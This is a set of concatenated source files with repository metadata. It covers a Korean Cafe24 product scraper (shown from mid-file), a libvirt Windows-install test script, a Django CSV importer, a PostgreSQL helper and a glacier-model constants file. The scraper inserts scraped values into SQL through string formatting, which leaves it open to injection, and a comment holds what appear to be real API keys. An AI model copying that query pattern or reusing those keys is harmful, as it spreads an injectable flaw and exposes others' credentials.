frame.select_one(productImg_List[a[2]]) == None :\n img = None\n else:\n imgDiv= frame.select_one(productImg_List[a[2]])\n img = imgDiv.select_one('img').get('src')\n\n # 사이트내 여러 선택사항\n \n \n select_list=[]\n for sel in frame.find_all('select'):\n select_list.append(sel)\n\n # 선택사항마다의 옵션 추출(모든 옵션 추출)\n for v in range(0, len(select_list)):\n option_list = []\n print('옵션')\n for op in select_list[v].find_all('option'):\n option_list.append([op.text])\n \n\n item_list=[]\n for i in range(2, len(option_list)):\n \n print(option_list[i][0])\n \n item_list.append(option_list[i][0])\n\n #먼저 의류에서의 size, 색상을 구분해보자\n\n \n ##옵션이 ['- [필수] 옵션을 선택해 주세요 -'], ['-------------------'] 이것 외에 있을 경우 즉 옵션이 존재하는 경우를 예외처리\n if(len(item_list)!=0):\n \n # print(\"haha\",item_list[0])\n # print(\"뭐냐\",item_list)\n #먼저 알파벳과 숫자만 출력(신발 사이즈 or M, L 와 같은 size)\n #맨처음에 나오는 단어를 통해서 색상, size를 구분\n size = re.compile('[a-zA-Z0-9]+').findall(item_list[0])\n color = re.compile('[가-힣a-zA-Z]+').findall(item_list[0])\n \n print(str(size))\n \n # 의류, 신발\n # 가정하기로는 size라는 언어가 나오거나 250과 길이가 0-3사이인 string이 들어오면(M,L,XL,XXL와 같은 것 포함) size로 판단\n # 그리고 color의 경우에는 한글은 빨강, 영어는 red와 같이 2글자 이상이라고 생각해서 color를 판단\n # 이상한 부품이나 엑세서리 옵션이 들어오는 경우는 예외처리가 어렵다.\n #첫번째에서 size의 len을 측정하는 이유는 size에 아무것도 안 들어가 있는 경우의 예외처리 그리고 or 뒤의 것은 모두 조건 처리 \n if(len(size)>0 and (str(size[0]).lower().strip() == 'size' or str(size[0]).lower().strip() == 'one' or str(size[0]).lower().strip() =='free' or (len(size[0]) <=3 and len(size[0])>=0))) :\n print(\"size_list에 for문을 이용한 item_list append\")\n for k in item_list:\n size_list.append(k)\n print(size_list)\n\n elif(len(color)>0 and len(color[0])>=2):\n print(\"color_lits에 for문을 이용한 item_list append\")\n for l in item_list:\n color_list.append(l)\n print(color_list)\n else:\n print(\"아무 옵션으로 달아놓고 other_list에 넣어서 db에 저장\")\n for m in item_list:\n other_list.append(m)\n print(other_list)\n\n print(option_list)\n \n if not option_list:\n continue\n else:\n optionstr = str(option_list)\n optionstr = optionstr.replace(\"'\", \"%\")\n\n print(name , price , img, optionstr)\n price = re.sub(r'[^0-9]', '', price)\n print(name , price , img)\n k = str(color_list).replace(\"'\",' ')\n r = str(size_list).replace(\"'\",\" \")\n cur.execute(f\"INSERT INTO platform_item VALUES('{name}','{price}','{url_name}','{r}','{k}','{None}','{img}')\")\n con.commit()\n\n print('------------------------------------------------')\n\n\n \n\n# python은 인터프리터 언어이기 때문에 순서를 잘 생각해야 한다.\n\n# arr = [['ozkiz1', 'KU5HdZg4BVXlfoLDEPu6EC'],['mall66','f7kOrfNK8UAn2Z93owrB4C'],['marketb','O7Y0xDwkJRijRHPATmMJnC']] #DB에서 불러와야함 (DICTIONARY 형태로)\n\n#platform이름하고 api-key값만 받아서 변수로 저장해서\n# key = pyautogui.prompt(\"key 값을 입력해주세요..\")\n# platform = pyautogui.prompt(\"json header를 입력해주세요..\")\n\n# flag = False\n#입력받은 값을 DB에 저장\n\n#list 형태로 가져와서 돌려보자\n\n#원하는 만큼 돌리기\n\n#list형태로 DB에서 받아와서 돌려보자\n##두개 짝을 지어서 밑의 for문에 넣어줘야 할 듯\n\n\n#json parsing part\ndef jsonParsing(json_url_list, count_json_list):\n for i in range (count_json_list) :\n for k in range(3500, 4350) :\n #위의 for문에 따라 parameter를 다르게 줘야함.\n platform = json_url_list[i][0]\n key = json_url_list[i][1]\n requestdata = requests.get(f\"https://{platform}.cafe24api.com/api/v2/products/{k}?shop_no=1&cafe24_app_key={key}\")\n # type으로 구분하는 걸로 바꿔야 할듯(json은 dict형태로 들어오기 때문에)\n # if type(requestdata)== dict :\n \n if requestdata.status_code == 200 :\n jsonData = requestdata.json()\n\n \n for data in jsonData :\n #가격이 음수로 나오는 이상한 값도 존재하고 description이 none이면 안되는 경우가 있어서 조건을 걸어줌.\n if float(jsonData.get(data).get(\"price\") or 0) > 0 and jsonData.get(data).get(\"description\") != None:\n\n price :int = jsonData.get(data).get(\"price\")\n # code :int = jsonData.get(data).get(\"product_code\")\n # tax_free_price :int = jsonData.get(data).get(\"price_excluding_tax\")\n name :string = jsonData.get(data).get(\"product_name\")\n img_url :string = jsonData.get(data).get(\"detail_image\")\n # des :string= jsonData.get(data).get(\"description\")\n # option : string = jsonData.get(data).get(\"\")\n # option = re.compile('[0-9]+').findall(des)\n # print(description)\n if(json_url_list[0]!=0):\n platform_name :string = json_url_list[i][0]\n else:\n continue\n\n str = f\"INSERT INTO platform_item VALUES('{name}','{price}','{platform_name}','{None}','{None}','{None}','{img_url}')\"\n cur.execute(str)\n con.commit()\n print(\"platform_name\", \" : \", platform_name , ',', data, \" : \", price, \", platform_name\",\" : \", platform_name, \"img_url\",\" : \", img_url)\n print(\"-----------------------------------------------------------------------------\")\n else :\n continue\n else:\n continue\n\n\n## Main\n\nprint(\"DB 연결완료\")\n# inputByUser()\nprint(\"사용자 입력 완료\")\npullHtmlList()\nprint(\"HTML 파싱 완료\")\npullJsonList()\nprint(\"json 파싱 완료\")\n\ncon.close()\n","repo_name":"four-idiots/Industry-project_Cafe24-Crawling-","sub_path":"Youngsu/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3855047414","text":"import os\nimport re\nimport time\nimport shutil\nimport tempfile\n\nfrom libvirttestapi.src import sharedmod\nfrom libvirttestapi.utils import utils, process\nfrom libvirttestapi.repos.installation import install_common\nfrom libvirttestapi.utils.utils import version_compare\n\n#virtio win disk driver\nVIRTIO_WIN_64 = \"/usr/share/virtio-win/virtio-win_amd64.vfd\"\nVIRTIO_WIN_32 = \"/usr/share/virtio-win/virtio-win_x86.vfd\"\nVIRTIO_WIN_SERVERS_64 = \"/usr/share/virtio-win/virtio-win_servers_amd64.vfd\"\nVIRTIO_WIN_SERVERS_32 = \"/usr/share/virtio-win/virtio-win_servers_x86.vfd\"\nVIRTIO_WIN10_64 = \"/usr/share/virtio-win/virtio-win_w10_amd64.vfd\"\nVIRTIO_WIN10_32 = \"/usr/share/virtio-win/virtio-win_w10_x86.vfd\"\n#virtio win net driver\nVIRTIO_WIN_ISO = \"/usr/share/virtio-win/virtio-win.iso\"\n\nWIN_UNATTENDED_IMG = \"/tmp/win_unattended.img\"\nHOME_PATH = utils.get_base_path()\n\nrequired_params = ('guestname', 'guestos', 'guestarch',)\noptional_params = {'memory': 4194304,\n 'vcpu': 2,\n 'disksize': 20,\n 'diskpath': '/var/lib/libvirt/images/libvirt-test-api',\n 'imageformat': 'qcow2',\n 'hddriver': 'virtio',\n 'nicdriver': 'virtio',\n 'macaddr': '52:54:00:97:e4:28',\n 'type': 'define',\n 'uuid': '05867c1a-afeb-300e-e55e-2673391ae080',\n 'xml': 'xmls/install_windows.xml',\n 'guestmachine': 'pc',\n 'graphic': 'spice',\n 'video': 'qxl',\n 'storage': 'local',\n 'sourcehost': '',\n 'sourcepath': '',\n 'gluster_server_ip': None\n }\n\n\ndef cleanup(mount):\n \"\"\"Clean up a previously used mountpoint.\n @param mount: Mountpoint to be cleaned up.\n \"\"\"\n if os.path.isdir(mount):\n if os.path.ismount(mount):\n logger.error(\"Path %s is still mounted, please verify\" % mount)\n else:\n logger.info(\"Removing mount point %s\" % mount)\n os.rmdir(mount)\n\n\ndef prepare_iso(iso_file):\n \"\"\"fetch windows iso file\n \"\"\"\n # download iso_file into /tmp\n windows_iso = iso_file.split('/')[-1]\n iso_local_path = os.path.join(\"/tmp\", windows_iso)\n if not os.path.exists(iso_local_path):\n cmd = \"wget \" + iso_file + \" -P \" + \"/tmp\"\n utils.exec_cmd(cmd, shell=True)\n return iso_local_path\n\n\ndef prepare_win_unattended(guestname, guestos, guestarch, envparser, hddriver, logger):\n if \"win7\" in guestos or \"win2008\" in guestos:\n cdkey = envparser.get_value(\"guest\", \"%s_%s_key\" % (guestos, guestarch))\n else:\n cdkey = \"\"\n\n windows_unattended_path = os.path.join(HOME_PATH,\n \"libvirttestapi/repos/installation/windows_unattended\")\n\n if os.path.exists(WIN_UNATTENDED_IMG):\n os.remove(WIN_UNATTENDED_IMG)\n\n cmd = 'dd if=/dev/zero of=%s bs=1440k count=1' % WIN_UNATTENDED_IMG\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"failed to create windows unattended image.\")\n return 1\n\n cmd = 'mkfs.msdos -s 1 %s' % WIN_UNATTENDED_IMG\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"failed to format windows unattended image\")\n return 1\n\n unattended_mount = \"/tmp/test_api_windows_unattended\"\n if os.path.exists(unattended_mount):\n logger.info(\"the windows unattended mount point folder exists, remove it\")\n shutil.rmtree(unattended_mount)\n\n logger.info(\"create mount point %s\" % unattended_mount)\n os.makedirs(unattended_mount)\n\n try:\n mount_cmd = 'mount -o loop %s %s' % (WIN_UNATTENDED_IMG, unattended_mount)\n ret = process.run(mount_cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\n \"failed to mount %s to %s\" % (WIN_UNATTENDED_IMG, unattended_mount))\n return 1\n\n win_os = ['win2008', 'win7', 'vista', 'win8', 'win2012', 'win10', 'win2016', 'win2019']\n if any(os in guestos for os in win_os):\n dest_fname = \"autounattend.xml\"\n if guestos == 'win7' and utils.isRelease(\"8\", logger):\n source = os.path.join(windows_unattended_path, \"%s_%s_rhel8.xml\" % (guestos, guestarch))\n else:\n source = os.path.join(windows_unattended_path, \"%s_%s.xml\" %\n (guestos, guestarch))\n elif '2003' in guestos or 'xp' in guestos:\n dest_fname = \"winnt.sif\"\n setup_file = 'winnt.bat'\n setup_file_path = os.path.join(windows_unattended_path, setup_file)\n setup_file_dest = os.path.join(unattended_mount, setup_file)\n shutil.copyfile(setup_file_path, setup_file_dest)\n source = os.path.join(windows_unattended_path, \"%s_%s.sif\" %\n (guestos, guestarch))\n\n dest = os.path.join(unattended_mount, dest_fname)\n\n unattended_contents = open(source).read()\n dummy_cdkey_re = r'\\bLIBVIRT_TEST_CDKEY\\b'\n if re.search(dummy_cdkey_re, unattended_contents):\n unattended_contents = re.sub(dummy_cdkey_re, cdkey,\n unattended_contents)\n\n logger.debug(\"Unattended install %s contents:\" % dest_fname)\n\n win_arch = \"\"\n if guestarch == \"x86_64\":\n win_arch = \"amd64\"\n else:\n if utils.isRelease(\"8\", logger):\n win_arch = \"x86\"\n else:\n win_arch = \"i386\"\n\n driverpath = \"\"\n drivernet = \"\"\n win_list = {\"win7\": \"w7\",\n \"win8\": \"w8\",\n \"win8u1\": \"w8.1\",\n \"win10\": \"w10\",\n \"win2008\": \"2k8\",\n \"win2008R2\": \"2k8R2\",\n \"win2003\": \"2k3\",\n \"win2012\": \"2k12\",\n \"win2012R2\": \"2k12R2\",\n \"win2016\": \"2k16\",\n \"win2019\": \"2k19\"}\n\n if utils.isRelease(\"8\", logger):\n if hddriver == \"scsilun\" or hddriver == \"scsi\":\n driverpath = \"E:\\\\vioscsi\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n else:\n driverpath = \"E:\\\\viostor\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n drivernet = \"E:\\\\NetKVM\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n else:\n drivernet = \"A:\\\\\"\n if guestos == \"win8u1\":\n driverpath = \"A:\\\\\" + win_arch + r\"\\Win8.1\"\n else:\n driverpath = \"A:\\\\\" + win_arch + \"\\\\\" + guestos[0].upper() + guestos[1:]\n\n unattended_contents = unattended_contents.replace('PATHOFDRIVER', driverpath)\n unattended_contents = unattended_contents.replace('DRIVERNET', drivernet)\n open(dest, 'w').write(unattended_contents)\n logger.debug(unattended_contents)\n\n finally:\n cmd = \"mount | grep %s\" % unattended_mount\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status == 0:\n cmd = 'umount %s' % unattended_mount\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"umount failed: %s\" % cmd)\n return 1\n\n cleanup(unattended_mount)\n\n os.chmod(WIN_UNATTENDED_IMG, 0o755)\n logger.info(\"Boot windows unattended created successfuly\")\n\n return 0\n\n\ndef set_win_driver(xmlstr, guestos, guestarch, logger):\n if utils.isRelease(\"8\", logger):\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_ISO)\n return xmlstr\n\n if version_compare(\"virtio-win\", 1, 9, 6, logger):\n win_list = [\"win7\", \"win8\", \"win8u1\", \"win10\"]\n win_servers_list = [\"win2003\", \"win2008\", \"win2008R2\", \"win2012\", \"win2012R2\", \"win2016\"]\n if guestarch == \"x86_64\":\n if guestos in win_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n elif guestos in win_servers_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_SERVERS_64)\n else:\n logger.error(\"%s don't in windows list.\" % guestos)\n else:\n if guestos in win_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n elif guestos in win_servers_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_SERVERS_32)\n else:\n logger.error(\"%s don't in windows list.\" % guestos)\n elif version_compare(\"virtio-win\", 1, 9, 4, logger):\n if guestarch == \"x86_64\":\n if guestos == \"win10\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN10_64)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n else:\n if guestos == \"win10\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN10_32)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n elif version_compare(\"virtio-win\", 1, 9, 3, logger):\n if guestarch == \"x86_64\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n return xmlstr\n\n\ndef install_windows_iso(params):\n \"\"\" install a windows guest virtual machine by using iso file \"\"\"\n # Initiate and check parameters\n global logger\n\n logger = params['logger']\n guestname = params.get('guestname')\n guestos = params.get('guestos')\n guestarch = params.get('guestarch')\n seeksize = params.get('disksize', 20)\n imageformat = params.get('imageformat', 'qcow2')\n diskpath = params.get('diskpath', '/var/lib/libvirt/images/libvirt-test-api')\n nicdriver = params.get('nicdriver', 'virtio')\n graphic = params.get('graphic', 'spice')\n video = params.get('video', 'qxl')\n xmlstr = params.get('xml')\n uuid = params.get('uuid', '05867c1a-afeb-300e-e55e-2673391ae080')\n hddriver = params.get('hddriver', 'virtio')\n sourcehost = params.get('sourcehost', '')\n sourcepath = params.get('sourcepath', '')\n storage = params.get('storage', 'local')\n installtype = params.get('type', 'define')\n\n options = [guestname, guestos, guestarch, nicdriver, hddriver, imageformat, graphic, video, diskpath, seeksize, storage]\n install_common.prepare_env(options, logger)\n\n if utils.isRelease(\"8\", logger) and guestos == \"win2008\":\n logger.info(\"virtio-win don't support win2008 on RHEL 8.\")\n return 0\n\n mountpath = tempfile.mkdtemp()\n diskpath = install_common.setup_storage(params, mountpath, logger)\n xmlstr = xmlstr.replace('/var/lib/libvirt/images/libvirt-test-api', diskpath)\n\n xmlstr = install_common.set_video_xml(video, xmlstr)\n\n if guestos == \"win10\" or guestos == \"win2016\":\n xmlstr = xmlstr.replace(\"\\n \", \"\\n \\n Westmere\\n \\n \\n\"\n \" \")\n\n xmlstr = xmlstr.replace('UUID', uuid)\n\n # NICDRIVER\n if nicdriver == 'virtio' or nicdriver == 'e1000' or nicdriver == 'rtl8139':\n xmlstr = xmlstr.replace(\"type='virtio'\", \"type='%s'\" % nicdriver)\n else:\n logger.error('the %s is unspported by KVM' % nicdriver)\n return 1\n\n # Graphic type\n xmlstr = xmlstr.replace('GRAPHIC', graphic)\n\n # Hard disk type\n if hddriver == 'virtio':\n xmlstr = xmlstr.replace('DEV', 'vda')\n elif hddriver == 'ide':\n xmlstr = xmlstr.replace('DEV', 'hda')\n elif hddriver == 'scsi':\n xmlstr = xmlstr.replace('DEV', 'sda')\n elif hddriver == 'sata':\n xmlstr = xmlstr.replace('DEV', 'sda')\n elif hddriver == 'lun':\n xmlstr = xmlstr.replace('\"lun\"', '\"virtio\"')\n xmlstr = xmlstr.replace('DEV', 'vda')\n xmlstr = xmlstr.replace('device=\"disk\"', 'device=\"lun\"')\n xmlstr = xmlstr.replace('disk device=\"lun\" type=\"file\"', 'disk device=\"lun\" type=\"block\"')\n iscsi_path = install_common.get_iscsi_disk_path(sourcehost, sourcepath)\n xmlstr = xmlstr.replace('file=\"%s\"' % diskpath, \"dev='%s'\" % iscsi_path)\n xmlstr = xmlstr.replace('device=\"cdrom\" type=\"block\">', 'device=\"cdrom\" type=\"file\">')\n elif hddriver == 'scsilun':\n xmlstr = xmlstr.replace('\"scsilun\"', '\"scsi\"')\n xmlstr = xmlstr.replace('DEV', 'sda')\n xmlstr = xmlstr.replace('device=\"disk\"', 'device=\"lun\"')\n xmlstr = xmlstr.replace('disk device=\"lun\" type=\"file\"', 'disk device=\"lun\" type=\"block\"')\n iscsi_path = install_common.get_iscsi_disk_path(sourcehost, sourcepath)\n xmlstr = xmlstr.replace('file=\"%s\"' % diskpath, \"dev='%s'\" % iscsi_path)\n xmlstr = xmlstr.replace('device=\"cdrom\" type=\"block\">', 'device=\"cdrom\" type=\"file\">')\n xmlstr = set_win_driver(xmlstr, guestos, guestarch, logger)\n\n logger.info(\"get system environment information\")\n envparser = install_common.get_env_parser()\n iso_url = envparser.get_value(\"guest\", guestos + '_' + guestarch)\n iso_file = install_common.get_path_from_url(iso_url, \".iso\")\n logger.debug('install source: %s' % iso_file)\n\n logger.info('prepare pre-installation environment...')\n iso_local_path = prepare_iso(iso_file)\n xmlstr = xmlstr.replace('WINDOWSISO', iso_local_path)\n\n status = prepare_win_unattended(guestname, guestos, guestarch, envparser, hddriver, logger)\n if status:\n logger.error(\"making windows unattended image failed\")\n return 1\n xmlstr = xmlstr.replace('WIN_UNATTENDED', WIN_UNATTENDED_IMG)\n\n logger.debug('dump installation guest xml:\\n%s' % xmlstr)\n conn = sharedmod.libvirtobj['conn']\n if not install_common.start_guest(conn, installtype, xmlstr, logger):\n logger.error(\"fail to define domain %s\" % guestname)\n return 1\n\n if not install_common.wait_install(conn, guestname, xmlstr, installtype, \"iso\", logger, \"12000\", guestos, iso_file):\n return 1\n\n time.sleep(60)\n if storage != \"local\":\n install_common.clean_guest(guestname, logger)\n install_common.cleanup_storage(params, mountpath, logger)\n\n return 0\n\n\ndef install_windows_iso_clean(params):\n \"\"\" clean testing environment \"\"\"\n logger = params['logger']\n guestname = params.get('guestname')\n guestos = params.get('guestos')\n guestarch = params.get('guestarch')\n diskpath = params.get('diskpath', '/var/lib/libvirt/images/libvirt-test-api')\n\n install_common.clean_guest(guestname, logger)\n install_common.remove_all(diskpath, logger)\n\n envparser = install_common.get_env_parser()\n iso_url = envparser.get_value(\"guest\", guestos + '_' + guestarch)\n iso_file = install_common.get_path_from_url(iso_url, \".iso\")\n iso_local_path = prepare_iso(iso_file)\n if os.path.exists(iso_local_path):\n os.remove(iso_local_path)\n\n iso_local_path_1 = iso_local_path + \".1\"\n if os.path.exists(iso_local_path_1):\n os.remove(iso_local_path_1)\n\n if os.path.exists(WIN_UNATTENDED_IMG):\n os.remove(WIN_UNATTENDED_IMG)\n","repo_name":"libvirt/libvirt-test-API","sub_path":"libvirttestapi/repos/installation/install_windows_iso.py","file_name":"install_windows_iso.py","file_ext":"py","file_size_in_byte":15335,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"26525821345","text":"import csv\nimport sys\nimport os\n\ndef import_codes():\n '''\n Imports a csv file to create Tree objects with location-specific trigger words.\n\n The command expects the database to have a TreeState object with the name: \"Welcome (city).\"\n This differentiates it from the generic TreeState (i.e., the one called \"Welcome\", \n triggered by the keyword \"connect\").\n '''\n reader = csv.DictReader(sys.stdin)\n\n for row in reader:\n root_state = TreeState.objects.filter(name__icontains='Welcome (city)').first()\n\n padded_code = row['Code'].zfill(4)\n \n tree_info = {\n 'trigger': padded_code,\n 'root_state': root_state,\n 'summary': 'city',\n }\n\n tree, created = Tree.objects.get_or_create(**tree_info)\n\n if created:\n sys.stdout.write('Created {}'.format(tree))\n\n sys.stdout.write('Successfully processed CSV!')\n\nif __name__ == \"__main__\":\n sys.path.append('..')\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"coordinated-entry-screening.settings\")\n\n from django.core.wsgi import get_wsgi_application\n application = get_wsgi_application()\n\n from decisiontree.models import Tree, TreeState\n\n import_codes()","repo_name":"datamade/coordinated-entry-screening","sub_path":"data/port_location_codes.py","file_name":"port_location_codes.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"38581180012","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.keras.backend as K\nimport tensorflow as tf\nfrom sklearn.metrics import confusion_matrix\n\nx = tf.constant([0.1,0.9, 2.5, 2.3, 1.5, -4.5])\ny=tf.constant([[1,0,0],[1,0,1]])\n\n\nprint((y[:,1]))\nweights = np.ones((2, 2))\nnp.array([[1,0,0],[1,0,1]])\nweights[0, 1] = 25\nweights[1, 0] = 5\n#final_mask = K.ones_like(y_pred[:, 0])\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n v = sess.run(y[:,0])\n print(v) # will show you your variable.\ncm=confusion_matrix([0, 1, 0, 1], [1, 1, 1, 0])\nprint(cm)\ntn, fp, fn, tp = cm.ravel()\n","repo_name":"truongtud/data-mining-cup-2019","sub_path":"implementation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"32690346320","text":"from logging import getLogger, StreamHandler, DEBUG, INFO, Formatter\n\nimport functools\nimport pathilico.pygletelm.effect as effect\nfrom pathilico.pygletelm.backend import program\n\nfrom pathilico.app.model import init_model\nfrom pathilico.app.update import update\nfrom pathilico.app.view import view\nfrom pathilico.app.subscriptions import subscriptions\nfrom pathilico.app.message import Msg\nfrom pathilico.app.main import load_dependencies\n\n\nLOGGING_CONFIG = dict(\n graphic_manager=\"INFO\",\n effect_executor=\"INFO\",\n backend=\"DEBUG\"\n)\n\n\ndef configure_app_logging_settings():\n stream_handler = StreamHandler()\n log_format = Formatter(\n '[%(asctime)s|%(name)s|%(levelname)s] %(message)s',\n datefmt='%H:%M:%S'\n )\n stream_handler.setFormatter(log_format)\n pathology_logger = getLogger(\"pfapp.Pathology\")\n pathology_logger.setLevel(INFO)\n pathology_logger.addHandler(stream_handler)\n annotation_logger = getLogger(\"pfapp.Annotation\")\n annotation_logger.setLevel(INFO)\n annotation_logger.addHandler(stream_handler)\n grouped_annotation_logger = getLogger(\"pfapp.GroupAnnotation\")\n grouped_annotation_logger.setLevel(INFO)\n grouped_annotation_logger.addHandler(stream_handler)\n grouped_annotation_logger = getLogger(\"pfapp.PickleDatabase\")\n grouped_annotation_logger.setLevel(DEBUG)\n grouped_annotation_logger.addHandler(stream_handler)\n\n\nSTR2SUB = {\n \"every\": effect.notify_every,\n \"once\": effect.notify_once\n}\n\n\nclass ScheduledBehavior(object):\n\n def __init__(self, subs=None):\n self.subscriptions = subs or effect.Subscriptions()\n\n def add_schedules(self, *subs):\n self.subscriptions = effect.Subscriptions(self.subscriptions, *subs)\n\n @classmethod\n def from_schedules(cls, schedules):\n \"\"\"Make the instance from tuple schedule\"\"\"\n subs = list()\n for sub_tuple in schedules:\n spec, msg, msg_kwargs = sub_tuple\n func = STR2SUB.get(spec[0], None)\n if func is None:\n continue\n s = func(msg, msg_kwargs, *spec[1:])\n subs.append(s)\n subs = effect.Subscriptions(*subs)\n return cls(subs)\n\n\ndef wrap_subscriptions_with_message_dispatcher(behaviors):\n def decorator(sub_func):\n @functools.wraps(sub_func)\n def wrapper(model):\n result = effect.Subscriptions(\n sub_func(model), behaviors.subscriptions\n )\n return result\n return wrapper\n return decorator\n\n\nif __name__ == \"__main__\":\n from pathilico.pygletelm.message import UnionMessage as Msg\n s = (\n ((\"every\", 5), Msg.Ok, dict(value=\"fuga\")),\n )\n schedule = ScheduledBehavior.from_schedules(s)\n print(schedule.subscriptions.effects)\n","repo_name":"yujota/pathilico","sub_path":"python/pathilico/misc/behavior_tools.py","file_name":"behavior_tools.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"14361689862","text":"from http import HTTPStatus\n\nimport psycopg2\nimport psycopg2.extras\nfrom psycopg2.errors import UniqueViolation\n\nfrom .maindb import set_up_tables, drop_all_tables\n\n\nclass PGConnection:\n \"\"\"Handles the main connection to the database\"\"\"\n\n def __init__(self, pg_url):\n\n try:\n self.conn = psycopg2.connect(pg_url)\n self.cur = self.conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n except Exception as ex:\n print(ex)\n\n def _execute_query(self, query, params=None, success_status=HTTPStatus.OK.value):\n try:\n self.cur.execute(query, params)\n self.conn.commit()\n except psycopg2.OperationalError as ex:\n self.conn.rollback()\n return str(ex), HTTPStatus.SERVICE_UNAVAILABLE.value\n except UniqueViolation as ex:\n self.conn.rollback()\n return str(ex), HTTPStatus.CONFLICT.value\n return self.cur, success_status\n\n def create_all_tables(self):\n \"\"\"Executes query creating all tables\"\"\"\n tables_to_create = set_up_tables()\n for query in tables_to_create:\n self.cur.execute(query)\n self.conn.commit()\n\n def drop_all_tables(self):\n \"\"\"Executes query deleting all tables\"\"\"\n tables_to_delete = drop_all_tables()\n for query in tables_to_delete:\n self.cur.execute(query)\n self.conn.commit()\n\n def save_income_data(self, query, params=None):\n \"\"\"Executes given query\"\"\"\n result, status = self._execute_query(query, params, success_status=HTTPStatus.CREATED.value)\n if status == HTTPStatus.CREATED.value:\n result = self.cur.fetchall()\n\n return result, status\n\n def fetch_one_row(self, query, params=None):\n \"\"\"Retrieves single row by given query\"\"\"\n result, status = self._execute_query(query, params)\n if status == HTTPStatus.OK.value:\n result = self.cur.fetchone()\n\n return result, status\n\n def fetch_all(self, query, params=None):\n \"\"\"Retrieves all results for query\"\"\"\n result, status = self._execute_query(query, params)\n if status == HTTPStatus.OK.value:\n result = self.cur.fetchall() or []\n\n return result, status\n","repo_name":"kostyanchick/ShopApi","sub_path":"service_api/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39279867328","text":"\"\"\"\n Declaration of constants\n Do not modify unless you are absolutely sure what you are doing.\n\"\"\"\n\n'Choose parameterisations'\nalbedo_method = 'Oerlemans98' # possibilities: 'Oerlemans98'\ndensification_method = 'Herron80' # possibilities: 'Herron80'\npenetrating_method = 'Bintanja95' # possibilities: 'Bintanja95'\nroughness_method = 'Moelg12' # possibilities: 'Moelg12'\nsaturation_water_vapour_method = 'Sonntag90' # possibilities: 'Sonntag90'\n\n' Inital constants'\ninitial_snowheight = 0.8 # Inital snowheigt\ninitial_snow_layer_heights = 0.1 # Initial thickness of snow layers\ninitial_glacier_height = 30.0 # Inital glacier heigt without snowlayers\ninitial_glacier_layer_heights = 1. # Initial thickness of glacier ice layers\n\ninitial_top_density_snowpack = 300. # Top density for inital snowpack\ninitial_botton_density_snowpack = 600. # Botton density for inital snowpack\n\ntemperature_top = 267.16 # Upper boudary conditation for inital temperature profile (K)\ntemperature_bottom = 271. # Lower boundary condition for inital tempeature profile (K)\nconst_init_temp = 0.1 # constant for init temperature profile used in exponential function (exponential decay)\n\nmerge_snow_threshold = 0.1 # (m) minimum height of layer, is used if fresh fallen snow is added as a new\n # layer or merged to the underlying layer\n\nminimum_snow_height = 0.01 # (m) minimum height of last snowlayer on glacier\n # If there is only one snow layer layer left this one is only merged if the height\n # is lower than the minimum_snow_height even is merge_new_snow_threshold is greater\nminimum_snow_to_reset_albedo = 0.01 # minimum snowfall to reset hours since last snowfall! Default was 0.005\n\ndensity_fresh_snow = 250. # density of freshly fallen snow [kg m-3]\n\nalbedo_fresh_snow = 0.85 # albedo of fresh snow [-] (Moelg etal. 2012, TC)\nalbedo_firn = 0.55 # albedo of firn [-] (Moelg etal. 2012, TC)\nalbedo_ice = 0.3 # albedo of ice [-] (Moelg etal. 2012, TC)\nalbedo_mod_snow_aging = 22 # effect of ageing on snow albedo [days] (Moelg etal. 2012, TC)\nalbedo_mod_snow_depth = 3 # effect of snow depth on albedo [cm] (Moelg etal. 2012, TC)\nroughness_fresh_snow = 0.24 # surface roughness length for fresh snow [mm] (Moelg etal. 2012, TC)\nroughness_ice = 1.7 # surface roughness length for ice [mm] (Moelg etal. 2012, TC)\nroughness_firn = 4.0 # surface roughness length for aged snow [mm] (Moelg etal. 2012, TC)\naging_factor_roughness = 0.0026 # effect of ageing on roughness lenght (hours) 60 days from 0.24 to 4.0 => 0.0026\n\nsurface_emission_coeff = 0.97 # surface emision coefficient [-]\n\nsnow_ice_threshold = 900.0 # pore close of density [kg m^(-3)]\nsnow_firn_threshold = 555.0 